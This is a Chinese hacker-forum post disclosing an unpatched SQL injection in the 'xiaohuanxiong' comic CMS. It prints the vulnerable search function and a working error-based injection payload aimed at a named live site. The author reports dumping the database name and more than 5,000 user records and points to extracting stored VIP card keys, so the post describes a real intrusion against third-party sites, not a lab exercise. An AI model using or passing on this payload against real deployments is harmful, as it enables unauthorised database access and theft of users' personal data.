• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

黄漫CMSandSQL注入0day


This Wind

Recommended Posts

某漫画cms中的SQL注入

Author:1x2Bytes

在某*站中发现多个使用该套cms的黄色漫画站,查看后台指纹发现是xhxcms,在github找到该套源码,

下载审计后发现一处报错注入

源码下载: https://github.com/hiliqi/xiaohuanxiong/

打开后在 application/index/controller/Index.php 93 行,的 search 方法

image.png

109行中调用了 bookService类 中的 search 方法

image.png

跟进bookService的search方法,在文件 application/service/BookService.php 的198行,看具体代码

image.png

可以看到没有做任何过滤就将用户输入的参数传入,导致SQL注入

实战相关站点:

image.png

public function search($keyword, $num)

{

return Db::query(

"select * from " . $this->prefix . "book where delete_time=0 and

match(book_name,summary,author_name,nick_name)

against ('" . $keyword . "' IN NATURAL LANGUAGE MODE) LIMIT " . $num

);

// $map[] = ['delete_time','=',0];

// $map[] = ['book_name','like','%'.$keyword.'%'];

// return Book::where($map)->select();

}链接地址https://www.bidickxxxx.com/search?keyword=1

Payload:

1%27) and extractvalue(1,concat(0x7e,database(),0x7e)) --+ 爆数据库

image.png

爆用户:

image.png

看了一下用户,5k多个 色批还挺多的该cms还存在vip功能,里面的卡密存放在另一张表中,具体利用方式查看源码中的表结构即可,应该算是

0day了,许多黄色漫画基本上都采用这个cms搭建

  • Like! 1
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now